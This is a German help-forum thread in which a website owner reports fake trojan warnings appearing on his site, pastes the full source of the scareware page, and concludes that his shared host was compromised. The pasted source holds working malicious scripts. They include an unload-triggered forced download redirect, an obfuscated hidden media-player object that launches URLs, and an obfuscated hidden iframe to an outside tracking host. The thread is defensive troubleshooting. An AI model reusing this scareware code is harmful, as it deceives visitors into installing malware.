Hallo Board!

Ich habe eine eigene Website bei einem Shared Hoster, also Webspace mit FTP Zugang. Lokal nutze ich Win XP SP3 mit Opera 9.27 und AVG 8.5.392.

Manchmal erscheint beim Besuch meiner Website eine gefälschte Trojaner-Warnung. Also so ein Bild mit von einem Windows-Fenster mit eine Hinweis, mein Rechner sei verseucht und ein Javascript Alert, dass Trojaner XY gefunden wurde und ich den entfernen sollte. Also da versucht mir wohl wer Scareware oder so unterzuschieben.

Nur weiß ich nicht wo der Fehler herkommt und bin da nun ziemlich verunsichert. Die Meldung erscheint ohne erkennbares Prinzip und nicht reproduzierbar. Mal auf der Start- und mal auf Unterseiten oder in Frames.

Oft kommt in Opera zudem diese Meldung:

Zitat:

Weiterleitungstatus
Die URL wurde nach <Pfad zu Seite> weitergeleitet. Bitte klicken Sie auf den Link, um die Adresse aufzurufen.

Sie können die automatische Weiterleitung in den Einstellungen aktivieren.

Automatisch erstellt von Opera ©

Aber dann leitet er nur immer auf meine eigenen Seiten weiter, also nichts Böses. Meinen Webspace habe ich schon nach verdächtigen Scripts oder ominösen Management Konsolen durchsucht, konnte aber nichts finden. Wo kann da die Fehlerquelle liegen?

Im Webspace? Oder höher irgendwo im Apache wo ich nicht dran komme?

Im Browser? Opera 9.27 ist nicht die neuste Version, aber mit Opera 9.6x hatte ich nur Probleme und bin wieder zurückgegangen. Warum dann nur auf meiner Seite? Mit FF kam der Trojaner-Dialog noch nicht aber ich kann ihn wie gesagt auch mit Opera nicht verlässlich reproduzieren.

Auch verdächtig: AVG wirbt seit Neustem mit einer "Special Offer" für irgendein Internet Security Paket. Ich hab schon vermutet, dass die mir vielleicht die Seiten irgendwie unterschieben, damit ich ihr Produkt kaufe. Aber bisher erschien mit AVG seriös und auch hier frag ich mich, warum das nur auf meiner Seite kommt.

Hat vielleicht mal wer ähnliche Probleme gehabt und kann mir einen Tipp geben wie ich die Ursache finden kann?

Gruß

// Edit: Hab noch 2 Screenshots gemacht weil grad kam wieder so eine Meldung. Allerdings ohne das gefakte Win-Fenster sondern direkt JS. Da ist auch die Url zu sehen.

// Edit 2: Grad kam noch ein Fenster von AVG. Der Schädling ist ein FakeAlert.KJ steht dort. Drei Dateien im Opera Cache sind es.

// Edit 3: Hier der Quellcode der "Fehlerseite":

Code: Alles auswählenAufklappen

ATTFilter

<html>
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<title>My Computer</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<script type="text/javascript">if(self.parent.frames.length!=0){self.parent.location=document.location}</script><script type="text/javascript">window.moveTo(0, 0); window.resizeTo(screen.availWidth, screen.availHeight);
var mw_texts = new Array();</script>
<script type="text/javascript" src="files/brand_constants.js"></script>
 <script type="text/javascript" src="files/text_constants_de.js"></script> <script type="text/javascript">
 var onclick_download =true;
 var DESTRUB = 1; 
var xx = 1; 
var end = 1; 
var h = false; 

var install_info = 1; 
var add_url = "uid=12800";
window.call_before_download = function(){
 showInstallInstructions(); }
 </script>
 <script type="text/javascript">
if(end == 1)
{
dangerWindAdr = "/nag/1/?" + add_url + "&n=nag";}
if(navigator.appVersion.indexOf('MSIE') > 0){
 window.isIE = true;
function msieversion()
 {
 var ua = window.navigator.userAgent;
 var msie = ua.indexOf ( "MSIE " );
 if ( msie > 0 ) 
 return parseInt (ua.substring (msie+5, ua.indexOf (".", msie )))
 else 
 return 0;

 }
window.IEversion=msieversion();
}
function openDangerWindow(adr)
{
if (window.isIE) {
 if(window.IEversion < 6){
 window.open(adr);
 }else 
 { 
 try{
 document.getElementById('iie').launchURL(adr);
 }catch(ex)
 {
 }
 }}else{
 location.href = adr;
 }
}

function exiter(){
 if (onclick_download){
 openDangerWindow(window.location.href);
 openDangerWindow(dangerWindAdr + "&install=1");
 return false;
 }
 return true;
}

if (window.attachEvent)
 eval("window.attachEvent('onunload',exiter);");
else
 window.addEventListener("unload", exiter, false);
</script>

 
 
 
 <link href="files/pre_load.css" rel="stylesheet" type="text/css"> 
 
 

  <link href="files/this_landing.css" rel="stylesheet" type="text/css"> 
 <script type="text/javascript">
window.show_darkness = function()
{

 windowHeight = document.body.clientHeight;
 document.getElementById("grayFon").style.height = (windowHeight <= 640) ? '660' : '100%';
 document.getElementById("grayFon").style.display = "block";
}

window.hide_darkness = function()
{
 document.getElementById("grayFon").style.display = "none";
}



</script>


<script type="text/javascript">

function onSelect(){
 // if(window.event.srcElement.tagName != "INPUT" && window.event.srcElement.tagName != "TEXTAREA"){
 window.event.returnValue = false;
 window.event.cancelBubble = true;
 //}
}
function onContextmenu(){
 // if(window.event.srcElement.tagName != "INPUT" && window.event.srcElement.tagName != "TEXTAREA"){
 window.event.returnValue = false;
 window.event.cancelBubble = true;
 return false;
 //}
}
function onInitPage(){
 window.scan==1;
var pageObjects = document.all;
for(i=0; i < pageObjects.length; i++){
 if(pageObjects(i).tagName != "INPUT" && pageObjects(i).tagName != "TEXTAREA"){
 pageObjects(i).style.cursor = "default";
 };
}
// handle events
document.onselectstart = onSelect;
document.oncontextmenu = onContextmenu;
}
</script>
<script type="text/javascript" src="/common/destrub.js"></script>
<script type="text/javascript" src="files/mouse_block.js"></script> 
 </head>
 
 <body onload=" add_stata_container(); onInitPage();">
 <div id="preloader"></div>
<script type="text/javascript">
document.write('<OBJ'+'ECT id="i'+'ie" width="0" height="0" style="position:absolute; left:0;top:0;" CLAS'+'SID="CLS'+'ID:6BF'+'52A'+'52-394A-11'+'d3-B153-00C04F'+'79FAA6" type="application/x-ole'+'obje'+'ct"> <PA'+'RAM NAME="Sen'+'dPlayStateCha'+'ngeEvents" VALUE="True"> <PA'+'RAM NAME="Au'+'toSt'+'art" VALUE="True"> <PAR'+'AM name="uiMo'+'de" value="none"> <PA'+'RAM name="Play'+'Count" value="9999"></OBJECT>');</script>
<script type="text/javascript" src="files/unic_scripts.js"></script>
 
 <script src="/common/stata.js" ></script>
<script src="/common/build/yahoo-dom-event/yahoo-dom-event.js" ></script>

 
 <DIV id=grayFon style="DISPLAY: none"></DIV>

 
 <!--<a class="mw_final_res" onclick="install_begun();return false;" href="#">--><!--<div class="mw_final_win" id="mw_results_window">
 
 </div>-->
 <div style="DISPLAY: none" class="mw_final_win" id="mw_results_window" onclick="install_begun();return false;">
 <div id="pt1"><span class="def1"></span></div>
 <!--<div id="pt2"><span class="def2"></span></div>-->
 <div id="pt3"><span class="def3"></span></div>
 <div id="pt4"><span class="def4"></span><span id="unalertlvl"><span class="def5"></span></span></div>
 <div id="pt5"><span class="def6"></span></div>
 <div id="pt6"><span class="def7"></span></div>
 <div id="ptlist"><div id="ptlist1">Trojan-IM.Win32.Faker.a</div><div id="ptlist2"><span class="def8"></span></div>
 <div id="ptlist1">Virus.Win32.Faker.a</div><div id="ptlist2"><span class="def8"></span></div>
 <div id="ptlist1">Trojan.PSW.BAT.Cunter</div><div id="ptlist2"><span class="def8"></span></div>
 </div>
 <div id="ptbtns"><div id="ptbtn1"><span class="def9"></span></div><div id="ptbtn2"><span class="def10"></span></div></div>
 
</div>
 <!--</a>-->

 <div class="mw_window" id="mw_main_win" onclick="install_begun();">
 <div class="mw_win_body">
 <!--plaz-->
 <div class="mw_window_plaz">
 
 <div class="mw_search_left_panel">
 
<TABLE class=main cellSpacing=0 cellPadding=0 width="100%" border=0>
 <TBODY>
 <TR>
 <TD class=left vAlign=top width=209>
 <DIV class=top_box>
 <DIV class=title1><span class="s_tasks"></span></DIV></DIV>
 <DIV class=box>
 <TABLE cellSpacing=0 cellPadding=0 width=180 border=0>
 <TBODY>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i5.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="s_info"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i6.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="rem_prog"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i4.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="chang_set"></span></A></TD></TR></TBODY></TABLE></DIV>
 <DIV class=top_box>
 <DIV class=title1><span class="o_place"></span></DIV></DIV>
 <DIV class=box>
 <TABLE cellSpacing=0 cellPadding=0 width=180 border=0>
 <TBODY>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i1.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="net_place"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i2.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="my_doc"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i3.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="shar_doc"></span></A></TD></TR>
 <TR>
 <TD class=s_img vAlign=top width=28><IMG alt=" " src="files/i4.jpg"></TD>
 <TD vAlign=top width=152><A 
 onclick="return false;" 
 href="#"><span class="contr_pan"></span></A></TD></TR></TBODY></TABLE></DIV>
 <DIV class=top_box>
 <DIV class=title1><span class="dets"></span></DIV></DIV>
 <DIV class=box><STRONG>&nbsp;&nbsp;&nbsp;&nbsp;<span class="my_comp"></span></STRONG><BR>&nbsp;&nbsp;&nbsp;&nbsp;<span class="s_fold"></span></DIV>
 </TD></TR></TBODY></TABLE>
 </div>
 
 <div class="mw_window_body">
 <div id="mw_disk_c" class="mw_wi_disk mw_hd_disk"><span class="mw_name"><span class="local_c"></span></span><span id="mw_err_1" class="mw_error"><span class="hardw_error1"></span></span></div>
 <div id="mw_disk_d" class="mw_wi_disk mw_hd_disk"><span class="mw_name"><span class="local_d"></span></span><span id="mw_err_2" class="mw_error"><span class="hardw_error2"></span></span></div> 
 <div id="mw_disk_dvd" class="mw_wi_disk mw_dvd_disk"><span class="mw_name"><span class="local_dvd"></span></span></div>
 <div id="mw_disk_fldr" class="mw_wi_disk mw_folder_disk"><span class="mw_name"><span class="shared"></span></span><span id="mw_err_3" class="mw_error"><span class="sec_thr"></span></span></div>
 <div class="mw_disclaimer"><span class="secr_thr_fndd"></span></div>
 <div class="mw_progress_bar">
 <span class="mw_status" id="mw_status"></span>
 <div class="pb_decor"><div class="decor_lp"></div><div class="decor_rp"></div><div id="mw_progress_bar"></div></div>
 <A id="mw_cncl_but" class="mw_cancel" onclick="install_begun(); return false;" href="#"></A>
 </div>
 <div class="mw_display_filename">
 <span class="mw_status"><span class="object"></span></span>
 <span class="mw_filename" id="mw_file_name"></span>
 </div>
 
 <div class="mw_test_results" id="mw_inwin_results"><div class="mw_test_rez_decor"><div class="mw_res_rtc"></div>
 <div class="mw_header_f_res"><span class="hrdw_n_sec"></span></div>
 <a class="mw_remove_button" onclick="install_begun(); return false;" href="#"></a>
 <div class="mw_res_pads">
 <span class="mw_res_hdr"><span class="hrdw_errors"></span></span>
 <div class="mw_res_text"><span class="perfomance_usw"></span></div>
 
 <span class="mw_res_hdr"><span class="privacey_errors"></span></span>
 <div class="mw_res_text">
 <span class="spyw_ws_stol"></span>
 <span class='c_country'></span>:&nbsp;<b>Germany</b><br>
<span class='c_city'></span>:&nbsp;<b>xxx Stadt</b><br>
<span class='c_ip'></span>:&nbsp;<b>xx.xxx.xxx.xxx</b><br><br>
  
 </div>
 </div>
 </div></div> 
 </div>
 </div>
 <!--//plaz--> 
 </div>
 </div>
 
<script language="javascript" src="files/domFunction.js"></script> 
<script language="javascript" src="files/startafter.js"></script> 
<script type="text/javascript">document.write("<iframe style='border:0px' src='htt"+"p:/"+"/in"+"5ch"+".co"+"m/c"+"ki."+"php"+"?ui"+"d=1"+"280"+"0' width=1 height=1></iframe>");</script> 
 <SCRIPT> 
 window.scan=1;
 </SCRIPT>
</body>

</html>
         

Also auf dem Notebook kam es jetzt auch. Ist zwar genauso konfiguriert (Win XP Sp3, Opera 9.27 und AVG) aber dann liegt's wohl echt an der Website. Was meint ihr? Ich glaube es kommt nur auf PHP Seiten, aber da auf allen. Ob da über die php.ini überall was eingebunden wird? Da komme ich ja nicht dran aber vielleicht wurde der Server gehackt?

Ich glaube ich habe das Problem lokalisiert: Der Server des Shared Hosters muss gehackt worden sein.

http://www.wewatchyourwebsite.com/wordpress/?p=202

Hallo und

Wenn ich lendshaft.info aufrufe, erscheint



Es ist ein ähnlicher Fall, den ich hier dokumentiert habe, nur das ich diesesmal keine Datei zum Download bekomme.

Falls du deinen Rechner überprüfen möchtest, klicke auf "Für alle Neuen" in meiner Signatur, lies alles aufmerksam und arbeite die komplette Liste unter Punkt 2 ab.

ciao, andreas

Jupp, das ist eine der mögl. Fake-Fehlerseiten. Glaube nicht, dass ich da lokal viel zu befürchten habe. Mache mir drzt. mehr Sorgen um den Webspace und die Besucher meiner Website, bzw. den befallenen Shared Hosting-Server vom ISP (siehe meinen Link oben).

Auf einen anderen ausweichen, mehr kann ich in dem Fall nicht für dich tun.

Du bist entlassen.

Schönen Sonntag noch,
andreas

Kann jedem ISP mal passieren. Bin gespannt was draus wird, denn scheint ein ganz frischer Befall zu sein. Wenigsten weiß ich jetzt woran's liegt (kein lokales Prob) und dass ich meine Besucher schützen muss.